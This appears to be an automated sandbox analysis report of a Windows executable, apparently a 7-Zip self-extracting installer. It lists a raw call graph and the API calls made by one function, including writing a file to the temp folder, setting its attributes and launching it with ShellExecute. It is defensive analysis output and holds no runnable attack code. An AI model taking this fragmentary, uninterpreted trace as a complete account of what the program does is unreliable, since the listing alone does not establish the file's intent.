9730->10505 9731 403093 84 API calls 9732 40414c 9731->9732 9733 404156 ??3@YAXPAX ??3@YAXPAX 9732->9733 9734 40416d ??3@YAXPAX ??3@YAXPAX 9732->9734 9733->9723 9734->9723 9735->9276 9737 40661a 2 API calls 9736->9737 9738 403b48 9737->9738 9738->9263 9740 408646 9739->9740 9752 4083d5 ctype 9739->9752 9740->9272 9741 40661a 2 API calls 9741->9752 9742 40243b lstrcmpW 9742->9752 9743 40786b 23 API calls 9743->9752 9745 407674 23 API calls 9745->9752 9746 407613 23 API calls 9746->9752 9747 403b40 2 API calls 9747->9752 9748 401f9d 19 API calls 9748->9752 9749 403f48 4 API calls 9749->9752 9750 4073d1 21 API calls 9750->9752 9751 407776 55 API calls 9751->9752 9752->9740 9752->9741 9752->9742 9752->9743 9752->9745 9752->9746 9752->9747 9752->9748 9752->9749 9752->9750 9752->9751 9753 407717 25 API calls 9752->9753 9754 4073d1 21 API calls 9752->9754 10515 40744b 9752->10515 9753->9752 9755 408476 ??3@YAXPAX 9754->9755 9755->9752 9757 40243b lstrcmpW 9756->9757 9758 4082fd 9757->9758 9759 40830b 9758->9759 10519 4019f0 GetStdHandle WriteFile 9758->10519 9761 40831e 9759->9761 10520 4019f0 GetStdHandle WriteFile 9759->10520 9763 408333 9761->9763 10521 4019f0 GetStdHandle WriteFile 9761->10521 9767 408344 9763->9767 10522 4019f0 GetStdHandle WriteFile 9763->10522 9765 40243b lstrcmpW 9769 408351 9765->9769 9767->9765 9768 40835f 9771 40243b lstrcmpW 9768->9771 9769->9768 10523 4019f0 GetStdHandle WriteFile 9769->10523 9772 40836c 9771->9772 9773 40837a 9772->9773 10524 4019f0 GetStdHandle WriteFile 9772->10524 9775 40243b lstrcmpW 9773->9775 9776 408387 9775->9776 9777 408395 9776->9777 10525 4019f0 GetStdHandle WriteFile 9776->10525 9779 40243b lstrcmpW 9777->9779 9780 4083a2 9779->9780 9781 4083b2 9780->9781 10526 4019f0 GetStdHandle WriteFile 9780->10526 9781->9266 9784 407636 9783->9784 9785 407658 9784->9785 9786 40764b 9784->9786 10530 407186 9785->10530 10527 407154 9786->10527 9789 407653 9790 4073d1 21 API calls 9789->9790 9791 407671 9790->9791 9791->9308 9793 407689 9792->9793 9794 40716d 2 API calls 9793->9794 9795 407694 9794->9795 9796 4073d1 21 API calls 9795->9796 9797 4076a5 9796->9797 9797->9308 9799 401411 2 API calls 9798->9799 9800 403f96 9799->9800 9801 402535 2 API calls 9800->9801 9802 403f9f GetTempPathW 9801->9802 9803 403fb8 9802->9803 9808 403fcf 9802->9808 9804 402535 2 API calls 9803->9804 9805 403fc3 GetTempPathW 9804->9805 9805->9808 9806 402535 2 API calls 9807 403ff2 wsprintfW 9806->9807 9807->9808 9808->9806 9809 404009 GetFileAttributesW 9808->9809 9810 40402d 9808->9810 9809->9808 9809->9810 9810->9293 9812 40787e 9811->9812 10536 40719f 9812->10536 9815 4073d1 21 API calls 9816 4078b3 9815->9816 9816->9312 9818 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9817->9818 9819 403e16 9817->9819 9818->9313 9820 402c86 16 API calls 9819->9820 9820->9818 9822 40243b lstrcmpW 9821->9822 9823 40455d 9822->9823 9824 404592 9823->9824 9825 401329 2 API calls 9823->9825 9824->9364 9826 40456c 9825->9826 9827 403b7f 19 API calls 9826->9827 9828 404572 9827->9828 9828->9824 9829 401429 2 API calls 9828->9829 9829->9824 9831 4012f7 2 API calls 9830->9831 9832 4043d4 9831->9832 9833 40254d 2 API calls 9832->9833 9834 4043df 9833->9834 9834->9353 9836 4021a9 9835->9836 9837 40218e LoadLibraryA GetProcAddress 9835->9837 9836->9410 9837->9836 9839 401411 2 API calls 9838->9839 9846 4048bc 9839->9846 9840 401329 2 API calls 9840->9846 9841 40494e 9842 404988 ??3@YAXPAX 9841->9842 9844 4048ab 3 API calls 9841->9844 9842->9363 9843 401429 2 API calls 9843->9846 9845 404985 9844->9845 9845->9842 9846->9840 9846->9841 9846->9843 9847 40243b lstrcmpW 9846->9847 9847->9846 9849 40661a 2 API calls 9848->9849 9850 403f50 9849->9850 9851 401411 2 API calls 9850->9851 9852 403f5e 9851->9852 9852->9337 9854 404cb1 ??3@YAXPAX 9853->9854 9855 404b15 9853->9855 9857 404cb7 9854->9857 9855->9854 9856 404b29 GetDriveTypeW 9855->9856 9856->9854 9858 404b55 9856->9858 9857->9323 9859 403f85 6 API calls 9858->9859 9860 404b63 CreateFileW 9859->9860 9861 404b89 9860->9861 9862 404c7b ??3@YAXPAX ??3@YAXPAX 9860->9862 9863 401411 2 API calls 9861->9863 9862->9857 9864 404b92 9863->9864 9865 401329 2 API calls 9864->9865 9866 404b9f 9865->9866 9867 40254d 2 API calls 9866->9867 9868 404bad 9867->9868 9869 4013e2 2 API calls 9868->9869 9870 404bb9 9869->9870 9871 40254d 2 API calls 9870->9871 9872 404bc7 9871->9872 9873 40254d 2 API calls 9872->9873 9874 404bd4 9873->9874 9875 4013e2 2 API calls 9874->9875 9876 404be0 9875->9876 9877 40254d 2 API calls 9876->9877 9878 404bed 9877->9878 9879 40254d 2 API calls 9878->9879 9880 404bf6 9879->9880 9881 4013e2 2 API calls 9880->9881 9882 404c02 9881->9882 9883 40254d 2 API calls 9882->9883 9884 404c0b 9883->9884 9885 402776 3 API calls 9884->9885 9886 404c1d WriteFile ??3@YAXPAX CloseHandle 9885->9886 9887 404c4b 9886->9887 9888 404c8c 9886->9888 9887->9888 9889 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9887->9889 9890 402c86 16 API calls 9888->9890 9889->9862 9891 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9890->9891 9891->9857 9901 4022b0 9892->9901 9896 401411 2 API calls 9895->9896 9897 40273a 9896->9897 9898 402772 9897->9898 9899 402535 2 API calls 9897->9899 9898->9453 9900 402757 MultiByteToWideChar 9899->9900 9900->9898 9902 4022be ??2@YAPAXI 9901->9902 9903 4022ea 9901->9903 9902->9903 9904 4022cf ??3@YAXPAX 9902->9904 9903->9453 9904->9903 9907 401ae3 9906->9907 9910 401a97 9906->9910 9907->9460 9908 401abc CharUpperW CharUpperW 9909 401af3 CharUpperW CharUpperW 9908->9909 9908->9910 9909->9907 9910->9907 9910->9908 9911->9479 9913 403e9e 9912->9913 9914 4022b0 2 API calls 9913->9914 9915 403eac 9914->9915 9915->9493 9917 40435e 9916->9917 9918 404375 9917->9918 9919 40436a 9917->9919 9920 4025ae 2 API calls 9918->9920 9936 4025f6 9919->9936 9922 40437e 9920->9922 9923 4022b0 2 API calls 9922->9923 9924 404387 9923->9924 9926 4025f6 2 API calls 9924->9926 9925 404373 9928 403ec1 9925->9928 9927 4043b5 ??3@YAXPAX 9926->9927 9927->9925 9929 403ecd 9928->9929 9931 403ede 9928->9931 9930 4022b0 2 API calls 9929->9930 9930->9931 9931->9499 9933 403f06 9932->9933 9933->9933 9939 4022fc 9933->9939 9935 403f13 9935->9505 9937 4022b0 2 API calls 9936->9937 9938 402610 9937->9938 9938->9925 9940 402340 9939->9940 9941 402310 9939->9941 9940->9935 9942 4022b0 2 API calls 9941->9942 9942->9940 9944 4022fc 2 API calls 9943->9944 9945 40264a 9944->9945 9945->9515 9947 403d3d 9946->9947 9958 403c63 9947->9958 9951 403cd3 9950->9951 9952 403c63 _wtol 9951->9952 9953 403cf4 9952->9953 9953->9554 9955 403d04 9954->9955 9956 403c63 _wtol 9955->9956 9957 403d1c 9956->9957 9957->9559 9959 403c6d 9958->9959 9960 403c88 _wtol 9959->9960 9961 403cc1 9959->9961 9960->9959 9961->9550 9963 4023e8 9962->9963 9964 4023f4 lstrcmpW 9963->9964 9965 402411 9963->9965 9964->9963 9964->9965 9965->9268 9967 408679 9966->9967 9967->9596 9969 40a7fe 9968->9969 9970 40b2fc 11 API calls 9969->9970 9971 40a823 9970->9971 9972 40a845 9971->9972 9973 40a82c 9971->9973 10014 40cc59 _EH_prolog 9972->10014 10017 40a3fe 9973->10017 9985 40b30d 9984->9985 9989 40dcfb 3 API calls 9985->9989 9986 40b321 9987 40b331 9986->9987 10453 40b163 9986->10453 9987->9599 9989->9986 9991 40151e 9990->9991 9992 401329 2 API calls 9991->9992 9993 40152b 9992->9993 9994 401429 2 API calls 9993->9994 9995 401534 CreateThread 9994->9995 9996 401563 9995->9996 9997 401568 WaitForSingleObject 9995->9997 10466 40129c 9995->10466 9998 40786b 23 API calls 9996->9998 9999 401585 9997->9999 10000 4015b7 9997->10000 9998->9997 10003 4015a3 9999->10003 10006 401594 9999->10006 10001 4015b3 10000->10001 10002 4015bf GetExitCodeThread 10000->10002 10001->9606 10004 4015d6 10002->10004 10005 407776 55 API calls 10003->10005 10004->10001 10004->10006 10007 401605 SetLastError 10004->10007 10005->10001 10006->10001 10008 407776 55 API calls 10006->10008 10007->10006 10008->10001 10010 401411 2 API calls 10009->10010 10011 4042ab 10010->10011 10012 401411 2 API calls 10011->10012 10013 4042b7 10012->10013 10013->9605 10025 40c9fc 10014->10025 10436 40a28e 10017->10436 10047 40a0bf 10025->10047 10181 40a030 10047->10181 10182 40e8da ctype 3 API calls 10181->10182 10183 40a039 10182->10183 10184 40e8da ctype 3 API calls 10183->10184 10185 40a041 10184->10185 10186 40e8da ctype 3 API calls 10185->10186 10187 40a049 10186->10187 10188 40e8da ctype 3 API calls 10187->10188 10189 40a051 10188->10189 10190 40e8da ctype 3 API calls 10189->10190 10191 40a059 10190->10191 10192 40e8da ctype 3 API calls 10191->10192 10193 40a061 10192->10193 10194 40e8da ctype 3 API calls 10193->10194 10195 40a06b 10194->10195 10196 40e8da ctype 3 API calls 10195->10196 10197 40a073 10196->10197 10198 40e8da ctype 3 API calls 10197->10198 10199 40a080 10198->10199 10200 40e8da ctype 3 API calls 10199->10200 10201 40a088 10200->10201 10202 40e8da ctype 3 API calls 10201->10202 10203 40a095 10202->10203 10204 40e8da ctype 3 API calls 10203->10204 10205 40a09d 10204->10205 10206 40e8da ctype 3 API calls 10205->10206 10207 40a0aa 10206->10207 10208 40e8da ctype 3 API calls 10207->10208 10209 40a0b2 10208->10209 10437 40e8da ctype 3 API calls 10436->10437 10438 40a29c 10437->10438 10454 40f0b6 GetLastError 10453->10454 10456 40b17e 10454->10456 10455 40b192 10455->9987 10456->10455 10457 40adc3 3 API calls 10456->10457 10458 40b1b6 memcpy 10457->10458 10463 40b1d9 10458->10463 10459 40b297 ??3@YAXPAX 10459->10455 10460 40b2a2 ??3@YAXPAX 10460->10455 10462 40b27a memmove 10462->10463 10463->10459 10463->10460 10463->10462 10464 40b2ac memcpy 10463->10464 10465 40dcfb 3 API calls 10464->10465 10465->10460 10467 4012a5 10466->10467 10468 4012b8 10466->10468 10467->10468 10469 4012a7 Sleep 10467->10469 10470 4012f1 10468->10470 10471 4012e3 EndDialog 10468->10471 10469->10467 10471->10470 10473 4021db 10472->10473 10473->9617 10475 4025ae 2 API calls 10474->10475 10476 402992 10475->10476 10477 4029be 10476->10477 10478 402640 2 API calls 10476->10478 10477->9686 10478->10476 10479->9686 10481 4029d2 10480->10481 10482 4029de 10480->10482 10499 4019f0 GetStdHandle WriteFile 10481->10499 10484 4025ae 2 API calls 10482->10484 10488 4029e8 10484->10488 10485 4029d9 10497 402425 ??3@YAXPAX ??3@YAXPAX 10485->10497 10486 402a13 10487 40272e 3 API calls 10486->10487 10489 402a25 10487->10489 10488->10486 10492 402640 2 API calls 10488->10492 10490 402a33 10489->10490 10491 402a47 10489->10491 10493 407776 55 API calls 10490->10493 10494 407776 55 API calls 10491->10494 10492->10488 10495 402a42 ??3@YAXPAX ??3@YAXPAX 10493->10495 10494->10495 10495->10485 10497->9683 10498->9672 10499->10485 10501 4012f7 2 API calls 10500->10501 10502 402676 10501->10502 10503 4012f7 2 API calls 10502->10503 10504 402682 10503->10504 10504->9704 10506 4025ae 2 API calls 10505->10506 10507 402785 10506->10507 10508 4027c1 10507->10508 10511 402628 10507->10511 10508->9731 10512 402634 10511->10512 10513 40263a WideCharToMultiByte 10511->10513 10514 4022b0 2 API calls 10512->10514 10513->10508 10514->10513 10516 407456 10515->10516 10517 40745b 10515->10517 10516->9752 10517->10516 10518 4073d1 21 API calls 10517->10518 10518->10516 10519->9759 10520->9761 10521->9763 10522->9767 10523->9768 10524->9773 10525->9777 10526->9781 10528 40661a 2 API calls 10527->10528 10529 40715c 10528->10529 10529->9789 10533 40716d 10530->10533 10534 40661a 2 API calls 10533->10534 10535 407175 10534->10535 10535->9789 10537 40661a 2 API calls 10536->10537 10538 4071a7 10537->10538 10538->9815 8035 40f3f1 8038 4024e7 8035->8038 8043 40245a 8038->8043 8041 4024f5 8042 4024f6 malloc 8044 40246a 8043->8044 8050 402466 8043->8050 8045 40247a GlobalMemoryStatusEx 8044->8045 8044->8050 8046 402488 8045->8046 8045->8050 8046->8050 8051 401f9d 8046->8051 8050->8041 8050->8042 8052 401fb4 8051->8052 8053 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8052->8053 8057 401fdb 8052->8057 8054 402095 SetLastError 8053->8054 8055 40201d ??2@YAPAXI GetEnvironmentVariableW 8053->8055 8054->8057 8058 4020ac 8054->8058 8056 40204c GetLastError 8055->8056 8069 40207e ??3@YAXPAX 8055->8069 8059 402052 8056->8059 8056->8069 8071 407717 8057->8071 8061 4020cb lstrlenA ??2@YAPAXI 8058->8061 8078 401f47 8058->8078 8064 402081 8059->8064 8065 40205c lstrcmpiW 8059->8065 8062 402136 MultiByteToWideChar 8061->8062 8063 4020fc GetLocaleInfoW 8061->8063 8062->8057 8063->8062 8067 402123 _wtol 8063->8067 8064->8054 8068 40206b ??3@YAXPAX 8065->8068 8065->8069 8067->8062 8068->8064 8069->8064 8070 4020c1 8070->8061 8085 40661a 8071->8085 8074 40774e 8089 4073d1 8074->8089 8075 40773c IsBadReadPtr 8075->8074 8079 401f51 GetUserDefaultUILanguage 8078->8079 8080 401f95 8078->8080 8081 401f72 GetSystemDefaultUILanguage 8079->8081 8082 401f6e 8079->8082 8080->8070 8081->8080 8083 401f7e GetSystemDefaultLCID 8081->8083 8082->8070 8083->8080 8084 401f8e 8083->8084 8084->8080 8086 406643 8085->8086 8087 40666f IsWindow 8085->8087 8086->8087 8088 40664b GetSystemMetrics GetSystemMetrics 8086->8088 8087->8074 8087->8075 8088->8087 8090 407444 8089->8090 8091 4073e0 8089->8091 8090->8050 8091->8090 8101 4024fc 8091->8101 8093 4073f1 8094 4024fc 2 API calls 8093->8094 8095 4073fc 8094->8095 8105 403b7f 8095->8105 8098 403b7f 19 API calls 8099 40740e ??3@YAXPAX ??3@YAXPAX 8098->8099 8099->8090 8102 402513 8101->8102 8114 40112b 8102->8114 8104 40251e 8104->8093 8178 403880 8105->8178 8107 403b59 8119 40393b 8107->8119 8109 403b69 8142 4039f6 8109->8142 8111 403b74 8165 4027c7 8111->8165 8115 401177 8114->8115 8116 401139 ??2@YAPAXI 8114->8116 8115->8104 8116->8115 8118 40115a 8116->8118 8117 40116f ??3@YAXPAX 8117->8115 8118->8117 8118->8118 8201 401411 8119->8201 8123 403954 8208 40254d 8123->8208 8125 403961 8126 4024fc 2 API calls 8125->8126 8127 40396e 8126->8127 8212 403805 8127->8212 8130 401362 2 API calls 8131 403992 8130->8131 8132 40254d 2 API calls 8131->8132 8133 40399f 8132->8133 8134 4024fc 2 API calls 8133->8134 8135 4039ac 8134->8135 8136 403805 3 API calls 8135->8136 8137 4039bc ??3@YAXPAX 8136->8137 8138 4024fc 2 API calls 8137->8138 8139 4039d3 8138->8139 8140 403805 3 API calls 8139->8140 8141 4039e2 ??3@YAXPAX ??3@YAXPAX 8140->8141 8141->8109 8143 401411 2 API calls 8142->8143 8144 403a04 8143->8144 8145 401362 2 API calls 8144->8145 8146 403a0f 8145->8146 8147 40254d 2 API calls 8146->8147 8148 403a1c 8147->8148 8149 4024fc 2 API calls 8148->8149 8150 403a29 8149->8150 8151 403805 3 API calls 8150->8151 8152 403a39 ??3@YAXPAX 8151->8152 8153 401362 2 API calls 8152->8153 8154 403a4d 8153->8154 8155 40254d 2 API calls 8154->8155 8156 403a5a 8155->8156 8157 4024fc 2 API calls 8156->8157 8158 403a67 8157->8158 8159 403805 3 API calls 8158->8159 8160 403a77 ??3@YAXPAX 8159->8160 8161 4024fc 2 API calls 8160->8161 8162 403a8e 8161->8162 8163 403805 3 API calls 8162->8163 8164 403a9d ??3@YAXPAX ??3@YAXPAX 8163->8164 8164->8111 8166 401411 2 API calls 8165->8166 8167 4027d5 8166->8167 8168 4027e5 ExpandEnvironmentStringsW 8167->8168 8171 40112b 2 API calls 8167->8171 8169 402809 8168->8169 8170 4027fe ??3@YAXPAX 8168->8170 8237 402535 8169->8237 8172 402840 8170->8172 8171->8168 8172->8098 8175 402824 8176 401362 2 API calls 8175->8176 8177 402838 ??3@YAXPAX 8176->8177 8177->8172 8179 401411 2 API calls 8178->8179 8180 40388e 8179->8180 8181 401362 2 API calls 8180->8181 8182 403899 8181->8182 8183 40254d 2 API calls 8182->8183 8184 4038a6 8183->8184 8185 4024fc 2 API calls 8184->8185 8186 4038b3 8185->8186 8187 403805 3 API calls 8186->8187 8188 4038c3 ??3@YAXPAX 8187->8188 8189 401362 2 API calls 8188->8189 8190 4038d7 8189->8190 8191 40254d 2 API calls 8190->8191 8192 4038e4 8191->8192 8193 4024fc 2 API calls 8192->8193 8194 4038f1 8193->8194 8195 403805 3 API calls 8194->8195 8196 403901 ??3@YAXPAX 8195->8196 8197 4024fc 2 API calls 8196->8197 8198 403918 8197->8198 8199 403805 3 API calls 8198->8199 8200 403927 ??3@YAXPAX ??3@YAXPAX 8199->8200 8200->8107 8202 40112b 2 API calls 8201->8202 8203 401425 8202->8203 8204 401362 8203->8204 8205 40136e 8204->8205 8207 401380 8204->8207 8206 40112b 2 API calls 8205->8206 8206->8207 8207->8123 8209 40255a 8208->8209 8217 401398 8209->8217 8211 402565 8211->8125 8213 40381b 8212->8213 8214 403817 ??3@YAXPAX 8212->8214 8213->8214 8221 4026b1 8213->8221 8225 402f96 8213->8225 8214->8130 8218 4013dc 8217->8218 8219 4013ac 8217->8219 8218->8211 8220 40112b 2 API calls 8219->8220 8220->8218 8222 4026c7 8221->8222 8223 4026db 8222->8223 8229 402346 memmove 8222->8229 8223->8213 8226 402fa5 8225->8226 8228 402fbe 8226->8228 8230 4026e6 8226->8230 8228->8213 8229->8223 8231 4026f6 8230->8231 8232 401398 2 API calls 8231->8232 8233 402702 8232->8233 8236 402346 memmove 8233->8236 8235 40270f 8235->8228 8236->8235 8238 402541 8237->8238 8239 402547 ExpandEnvironmentStringsW 8237->8239 8240 40112b 2 API calls 8238->8240 8239->8175 8240->8239 11204 40e4f9 11205 40e516 11204->11205 11206 40e506 11204->11206 11209 40de46 11206->11209 11212 401b1f VirtualFree 11209->11212 11211 40de81 ??3@YAXPAX 11211->11205 11212->11211 9087 411388 ??2@YAPAXI 9088 411397 9087->9088

                                                                                            Executed Functions

                                                                                            Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                              • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                              • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                              • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                              • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                                                              • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                              • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                            • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                                                            • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                                                              • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                              • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                              • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                              • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                              • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                                                              • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                                                            • _wtol.MSVCRT ref: 0040509F
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                                                            • _wtol.MSVCRT ref: 00405217
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                                                              • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                              • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                              • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                                              • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                              • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                              • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                              • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                              • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                                              • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                                              • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                                              • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                                              • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                                            • wsprintfW.USER32 ref: 00405595
                                                                                            • _wtol.MSVCRT ref: 004057DE
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                                            • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                                            • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                                            • memset.MSVCRT ref: 004060AE
                                                                                            • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                                            • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
